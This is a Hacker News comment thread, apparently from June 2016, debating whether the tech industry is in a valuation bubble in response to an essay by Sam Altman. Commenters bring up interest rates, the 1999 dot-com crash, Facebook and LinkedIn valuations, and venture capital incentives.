To those of you like me I recommend you to read about what was happening in 95-99. The panorama was crazy, and today's context doesn't compare to the one of those days.

At the end, if the macroeconomic environment changes, who cares? Yes, paying attention to the macro is important and that may even imply changes in strategy, but should you not start a startup because there's a bubble? Even worse, should you (person who hasn't built anything but criticizes everyone who builds something) try to convince your friends not to start startups because we're in a bubble?

The main difference between today and 1999 is that digital products are actually generating value in people's lifes. Please don't compare pets.com to WhatsApp

4
caffeinewriter 3 days ago 4 replies      
Just because the bubble hasn't burst yet, doesn't mean we're not actually in a bubble. That line of reasoning irks me a bit, but still, it is laughable how the imminent bursting of the bubble has been predicted for nearly a decade.
5
bdrool 3 days ago 2 replies      
If the intended insinuation of this essay is that somehow there aren't a bunch of seriously over-valued companies out there, or that there isn't a long-overdue downturn on the way, then I'm afraid I can't bring myself to agree.

People young enough to have never been through a downturn in their professional career are usually in denial right up until the moment it happens. And the people who try to call the bubble early, as funny as it may be to make fun of them as is being done here, are usually the ones who have been through it before, see it coming early, and try to warn everyone, even though no one ever listens (too busy enjoying the party!)

6
spitfire 3 days ago 0 replies      
Over the last 16 years we've seen several boom/bust cycles in speculative markets driven by interest rates.

First the bursting of the first tech bubble. Then Greenspan's housing bubble in 2001-2007. Then interest rates were held abornmally low, for 80 months straight, which is something that the world has _never_ seen.

Would we have seen this tech boom if interest rates had been say 5% and capital had somewhere else to flow?

I'm pretty wary of "The music hasn't stopped playing, so it can't possibly be a bubble" arguments. Lets watch what happens as rates go up and venture backed tech has to compete with other returns.

7
rrggrr 3 days ago 0 replies      
Those aged 65 and up control most of the investment capital in the United States. This is not a risk-taking demographic regardless if the capital is family money or managed money. It is a demographic that wants to preserve capital in exchange for modest returns.

The same can be said for pension plans who formerly invested heavily in alternative investments, and who now must ensure fund stability as pension payouts peak in the coming years.

Foreign investors and sovereign funds are under increased pressure to keep foreign currency at home, particularly in China and Russia.

Interest rates are poised to rise, held back by a US Federal Reserve loaded, cocked and ready to fire; thereby increasing VC carrying costs.

The global political environment is not favorable for economic investment. Highly publicized bellicose rhetoric and outright conflict is pervasive. Investors loathe the uncertainty and anxiety this creates.

So, this time its different

I suspect there may be strong returns to be had in M&A, particularly after Microsoft's aggressive bid for LinkedIN. I note even Twitter is performing well today*. I imagine there may still be strong IPO's, like Twilio seems positioned to be. But, I believe we're entering a less liquid and lower alpha period in investing.

I can't say I have special knowledge on the topic, other than being a close observer.

(Disclaimer: I do own TWTR)

8
profmonocle 3 days ago 2 replies      
> One analyst predicts Facebook will easily be worth $200 billion by 2015. Right on! And by 2020 it could be the first company with a $1 zillion market value, so buy-buy-buy, everybody!

Decided to look this one up. It hit $200B in late 2014, so that prediction was impressively spot-on: https://ycharts.com/companies/FB/market_cap

9
doppp 3 days ago 6 replies      
Sam HAS to play down the fact that we are in a tech bubble. He is, after all, a venture capitalist, so do note the conflict of interest here.

My friend referred me to this Bill Gurley article [1]. My metric for whether there is another bubble is not so sophisticated. I feel that there is a bubble when celebrities (like sports personalities) begin investing in questionable startups [2][3]. Harkens back to the '99 bubble.

Edit: Before you bring up Ashton Kutcher, a single data point does not a trend make. But yes, we've been in a bubble long before he began investing actually.

[1]: http://abovethecrowd.com/2014/01/24/on-bubbles/

[2]: http://www.vanityfair.com/news/2016/04/kobe-bryant-silicon-v...

[3]: https://e27.co/boxing-champion-manny-pacquiao-throws-his-hat...

10
mark_l_watson 3 days ago 0 replies      
Well, that is the problem with people predicting the future: they may be correct on fundamentals but the world is a chaotic place and predicting just when something will happen, even if it is likely to happen in the future, is a bad bet.

I personally believe that the current economic regime, requiring constant growth (and large growth) for health is not sustainable. Am I willing to bet on when the next big economic crash will occur? No.

11
gedrap 2 days ago 0 replies      
I don't really get the point.

So at the moment, today, tech industry isn't dead / crashed . So we can find people who said that it will and point at them that they were wrong. And if the crash comes tomorrow, are we going to say 'well, it was predicted soooo', do the usual post-fact rationalization on how obvious it was, etc.

But so what? We can do exactly this for any prediction whatsoever. Wars, financial crashes, economical and political events, etc. People, from cab drivers to executives and ministers, make wrong predictions all the time.

I honestly don't see the point of it, other than highlight that someone was wrong and... feel good about yourself that you were on the winning side this time?

Should we stop predicting? Yeah, probably. But the ending 'And now Trump thinks were in a tech bubble too, so maybe its true.' doesn't really deliver this message.

12
coldtea 3 days ago 1 reply      
One difference between a bubble and a declining market segment is that the bubble bursts -- abruptly.

So it doesn't matter whether people repeat prophecies or doom for a long time or not -- unless it's actually a bubble, it won't ever burst. At worse it will start declining slowly.

That's why the arguments like "it hasn't burst all those years so it's not a bubble" don't get it either.

Being a bubble is not something that has to do with duration (whether it lasts for a long time or not) -- it has to do with the non-linear effects of the burst.

Of course it the burst never comes, or it's instead some gradual decline, then it's not a bubble.

13
reilly3000 3 days ago 0 replies      
The only real indication that we are in a bubble is the frailty of the future of digital advertising. I don't think there are many hypervalued hardware firms. Advertising hinges on corporate and consumer purchasing power which seems to be healthy if slightly waning, and to a certain extent the personal tolerance of ads and highly abundant Web content. Outside of the US the appetite for both continues to grow year over year. While display on publisher sites has many weak spots, search and social ads a solid footing on most advertiser's budgets. They won't dissappear overnight. What will?
14
jasonjei 3 days ago 2 replies      
The Microsoft LinkedIn acquisition seems to have positively signaled investor confidence, in spite of calls that the sky is falling. Whatever odds there were for a "bubble burst" are probably lessened by this purchase.
15
Dwolb 3 days ago 0 replies      
This post suffers from confirmation bias which feels weird coming from a writer whose entire accelerator is founded on principles which exploit other peoples' biases (e.g. others are biased toward teams with traditional credentials whereas YC evaluates more on accomplishments and building things)
16
nikdaheratik 2 days ago 0 replies      
Whatever this is, it isn't a repeat of the late 90s. The term "bubble" doesn't even mean anything except that alot of people, many of whom aren't even investing or selling short, assume that the prices are way higher than they should be.

The 90s was a typical gold-rush type of scenario where no one knew what anything was worth, and so investment continued until someone figured out that there was no one everyone could make money even if the entire mountain was made of gold and started betting against the herd.

Going by the cyclical pattern, we're overdue for a recession in the U.S. However, no one knows how severe it could be, especially considering that the "recovery" from the '08 meltdown was tepid at best.

As far as tech investing goes, the best way to make money is to back a number of good looking horses and hope the wins pay for the losses. Which is the same as it always was. If you're smart, you'll also diversify in case something does happen to cause the entire industry to take a dive. However, short of a major quake taking down most of SV, the number of different ways businesses are trying to make money means that, IMO, it's more difficult for one event to take them all down, unlike 1999.

17
adventured 3 days ago 0 replies      
It seems like it was just yesterday that everyone was arguing the Facebook valuation from Microsoft's investment was impossible to ever live up to.

$15 billion. They'll do half that in net income in the next four quarters.

Interestingly the $125 per user figure quoted on the Gigaom article (the $15 billion valuation divided by their daily actives or total users at the time), is now more like $195 per user (1.68 billion daily actives with $328b market cap).

18
alekratz 3 days ago 2 replies      
If you say "we're in a XYZ bubble" for long enough, you'll eventually be right.
19
aabajian 3 days ago 1 reply      
Anecdotal, personal, and completely my opinion, but my parent's entire life savings is $750,000. That's about how much Mike Markkula invested in early Apple ($250,000 in 1977 dollars adjusted for inflation). I like this figure because it represents a serious amount of money - you could retire off of it, if you're frugal. So why take the risk of investing such a large sum in a startup?

I presume that the objective of investors (who have much more money that $750K) is to either to a) make money or b) make money and bring a new technology/innovation to market. In a bubble I see more of the former (focus on money) without the innovation piece. How many car sharing (Uber/Lyft/Sidecar), food-delivery (GrubHub/OrderAhead/DoorDash), and credit card alternatives (Venmo/Coin/Stratos) do we really need? Would the founders of such companies put their retirement savings into starting these companies? Maybe, maybe not.

Innovation is key to keeping a bubble at bay. Y combinator has quite a few companies where the goal is to make money through innovation. These are ventures dedicated to biomedical research (DNA sequencing/Gene Mapping), novel algorithm development (AI/Machine Learning), improving social welfare (Water Filtration/Education), etc. I'd be happy to see a world full of these, and I wouldn't call it a bubble. It would be people pursuing ideas that could solve real problems in the world. Ideas that are worth investing your (and therefore an investor's) money.

I believe that innovative companies keep a bubble at bay precisely because they are less likely to succeed. Investors must faithfully evaluate innovative companies to see if their technology is feasible and if the market is ready.

20
datashovel 3 days ago 0 replies      
I have a hard time understanding precisely what gives these companies such high perceived values.

In the end I have to believe people are measuring the value based almost exclusively on the website's "traction". Frankly, I think "traction" is an outdated metric (especially when it comes to the web).

I almost feel like I have to remind folks here (who are arguing against the premise that we're in the middle of a period of extraordinarily excessive valuations) that the web provides an almost frictionless environment to change. If tomorrow someone launches a better LinkedIn, there is ZERO reason I can't switch over (or use both) that same day).

In tomorrow's world I see individual engineers (or surely teams of less than 10) will have the capacity to build a product better than LinkedIn, at and beyond the scale of LinkedIn, in their garage (thanks to the cloud). With little to no investment.

In the future (by my estimation the not-too-distant future) $20+ billion for a resume website will be unconscionable (if it isn't already).

21
draw_down 3 days ago 1 reply      
The strangest thing to me is how upset this makes people, even though it doesn't affect them, at least not directly. Look at the quote about Facebook's valuation- who gets so upset about that?

Why is it an affront to you if some business guys can figure out a way to call FB worth $33B? Of course now nobody would question that, because they're one of only two games in town when it comes to advertising. But even before that, why get so pissy? If the valuation is sooo crazy then bet against it. Why get so upset that LinkedIn sold for $26B? If you think MS wasted their money then let them waste it.

Why be so concerned that VCs are making bad bets? Let them! Are you a limited partner? Then who cares?!

I get that people don't like the knock-on effects, rent goes up, engineers are harder to hire. But I don't see why anyone should give a shit if a dumb VC wasted their firm's money on a dumb idea.

22
vasilipupkin 3 days ago 0 replies      
the fact that there are very few tech ipos is probably the best indication that there is a bubble in common stock valuations of private companies, which would not be supported by public markets. Why? because public markets have many sophisticated players who can easily sell short and private markets don't.
23
ijafri 3 days ago 1 reply      
I don't think the bubble thing is true for our time, nor it will be in the near future, it's just tech has become more competitive than ever. I am too young to know exactly the circumstance surrounding the last .dot com bubble when did it happen ... but I guess, it could have happened, the VC had not seen the full potential of the internet back then...

I can't buy the notion, that we will or ever see a bubble ... it's just ups and lows just about anything in life ... because at this point and in future internet is too larger to be vulnerable to it.

But that said, there is a little room left, for developers living in the mom's basement., and that's truly sad.

24
TedHerman 2 days ago 0 replies      
As other comments point out, whether there is a bubble (extreme overvaluation) or not depends in part on the financial background. If you just look at interest rates, they tell us that the future will be stable, the world is awash in capital, and you'll have decades to extract the value of your investment. For example, the $247 per LNKD user could be reasonable, notwithstanding that only around 1/4 of these users reportedly are active. So over 20 years, getting about a dollar a month per user will break even. And this is just one aspect, since global growth trends and unlocking network effects offer more value. But these metrics don't give the whole story. The central banking infrastructure pumps capital into the world due to deflationary fears, so can we really trust interest rates and assumptions of stability and growth trends to determine whether the value of unicorns is enduring?

An interesting aspect is Altman's position, argued by citing "they were wrong time and time again" data points. His day job is to create new ventures, some of which will presumably disrupt existing giants and lower their value. This dynamic is dangerous to the assumption of stability in organizational trends upon which value metrics are based. In some sense, there is overvaluation (because new opportunities are undervalued), if not a bubble.

25
gchokov 2 days ago 0 replies      
Hilarious article. The fact that Silicon Valley VCs can make money out of extremely overpriced companies doesn't make them right. It's just an arrogant read this time. Mr Sam - you should be ashamed.
26
crystaln 2 days ago 0 replies      
This seems to violate yc and Paul Graham's general disdain for sarcasm.
27
api 3 days ago 0 replies      
We just lived through two mega-bubbles: dot.com and real estate. Actually three if you count oil. People now see bubbles everywhere and in everything.
28
datashovel 3 days ago 0 replies      
One of my most memorable "bubble talk" moments was when I was living in South Florida. To clarify, that's only to say it's easy for me to recall given the unique circumstances of the conversation, not that it was particularly enjoyable for anyone involved.

A bunch of my co-workers and I were out to lunch with a new member of our team (management level). The conversation turned to the real estate boom that we were in the middle of. The new guy had already, during the conversation, let us all know he had made a nice chunk of change in real estate recently, and was in the middle of looking for a new house with his wife. They apparently had their eye on a few really nice waterfront properties. That sort of got a few folks talking "bubble". He laughed it off and smugly told us all that (paraphrased) "in reality the market is just going to keep going up."

Famous last words, he ended up closing a few months before the crash.

29
selectron 3 days ago 0 replies      
Markets can stay irrational for longer than you can remain solvent. Just because the bubble hasn't burst, doesn't mean we are not in one. Of course the converse is also true, just because the market has been going up doesn't mean it will go down. It will be interesting to see what happens if the Fed ever raises the interest rates.
30
baron816 3 days ago 2 replies      
Can anyone point to a bubble where everyone was, for years, constantly asking whether or not it's in a bubble?
31
akjetma 3 days ago 0 replies      
I wonder if the frequency of "We're not in a bubble" articles tracks its counterpart over time.
32
andyfleming 3 days ago 0 replies      
I don't think the bubble is just going to "burst". I think the rapid growth in technology is real. The market may correct itself some, like it is right now (particularly with investors), but I don't think there is going to be a great tech apocalypse.
33
newacct23 3 days ago 1 reply      
The 2008 bubble was caused by fraud, what is the current bubble caused by? Most people are saying we are in a bubble because all of these companies that are making 0 dollars are worth extremely large amounts of money. Everybody is aware that these companies aren't making money however and still believe the company is worth an insane amount of money.

If everyone is willfully deluding themselves and see nothing wrong with it, for what reason do we believe that it will change in the future and that the bubble will pop? And the current situation is different from the 2008 crash in that people know what they are buying into, companies that don't make money, and they don't care.

34
zxcvvcxz 2 days ago 0 replies      
Let's put it this way -- if everything were fine and companies had strong fundamentals, we wouldn't need some investor to tell us otherwise.
35
daveguy 3 days ago 0 replies      
Final argument from the article: "now Trump thinks we're in a tech bubble too, so maybe it's true."

To which I say: "Even a broken clock is right twice a day."

37
dsmithatx 3 days ago 0 replies      
The truth is things probably have been overvalued for while. Bubbles pop when enough people fear and start to sell. A good article on this should create a graph of how many articles over time have been jumping on the tech bubble bandwagon. Anecdotally I've noticed a massive increase in the past few months by more respected business people.
38
jrbapna 3 days ago 0 replies      
As the rate of innovation continues to increase exponentially, these so called "bubbles" will only grow bigger. The future will have A LOT MORE companies valued at 1000x revenue, not less. Think about all the new industries poised to exist just in the next decade: A.R. V.R. A.I., Bionics, Space, etc etc. Exciting times we're living in.
39
halis 3 days ago 0 replies      
Companies get acquired now whether they've ever had a viable plan to make money or not. Sounds like a bubble to me!
40
rosalinekarr 3 days ago 0 replies      
> The valuation of $1 billion not as insane as the [$15 billion] valuation placed by Microsoft on Facebook was jaw dropping.

lol

41
beatpanda 3 days ago 0 replies      
If we're not in a bubble, we have very serious structural economic and social problems created by the tech industry that we need to solve. The (supposedly sustainable) rising tide is mostly drowning people, and if no reprieve in the form of a crash is coming, we need another solution.
42
H0n3sty 2 days ago 0 replies      
Most real estate agents, mortgage brokers, and building contractors couldn't see the real estate bubble either. It's hard to see a bubble when you're inside of it.

The tech bubble may very well outlast the US dollar bubble.

43
Xyik 3 days ago 0 replies      
Valuations have been questionable but that alone does not mean we are in a bubble. I'd rather we looked at the amount of funding that has been raised and the amount loss to gauge whether we're in a bubble.
44
anysz 3 days ago 0 replies      
Come on Sam, these clickbait fools aren't worthy of such attention.
45
seanmcdirmid 3 days ago 0 replies      
There might not be a bubble in tech, but China is absolutely scaring me right now. If those Chinese bubbles pop, it might shake investor confidence in other sectors as well (e.g. tech).
46
sndean 3 days ago 1 reply      
As someone who's completely ignorant about this sort of thing, and about whether it's a bubble:

If it is indeed a bubble, is there anything positive that will result from it bursting?

47
anexprogrammer 3 days ago 0 replies      
It feels just like 1998, but for the fact there's enough folk memory of the dot com bust to put IPOs on ice.

I guess they don't want to risk duplicating lastminute.com

Only question is when it pops.

48
tomahunt 3 days ago 0 replies      
A Google Trends search for "bubble" might also suggest we are not in a bubble. [I find a peak around 2009]
49
ajsbae 3 days ago 0 replies      
As a college student, I wonder what implications this will have on the future job market.
50
allworknoplay 3 days ago 2 replies      
What the hell is Sam talking about? Quoting people from 2007-2008 saying we were in a bubble then as if nothing was wrong at the time? 2008/2009 was only partly insane because of tech, but it was an INSANE time: VCs were too scared to ask their LPs for cash because they knew the capital calls would fall short. Dealflow utterly halted for 6 months, and took another year after that to get back to something that felt productive. We were absolutely in a bubble then.

Using bubble-quotes from that era as evidence that we're not in a bubble now is absolutely preposterous.

51
vadym909 3 days ago 0 replies      
You just jinxed us man. Taunting Lady Luck like that? Now we're really screwed!
52
jayzalowitz 3 days ago 0 replies      
Thats just like... your opinion man...
53
jmanooch 2 days ago 2 replies      
Everyone who says we are in a bubble should come up with a systematically better way to allocate capital.

Otherwise: shut up and fuck off.

Because for all the hullaballoo about poor allocation in X or Y [Combinator] or Z company being correct, the broader premise, that the market is working out good things to do with money, is clearly somewhat proven by Silicon Valley's last decade of spend: cheap, connected, actually smart smartphones; electric cars becoming affordable; affordable re-useable rockets. All of which are vastly humanly benign, as well as good ways to make money (not all of which do, but some do, i.e. phones).

So, pony up, or fuck the fuck off.

       cached 18 June 2016 04:11:01 GMT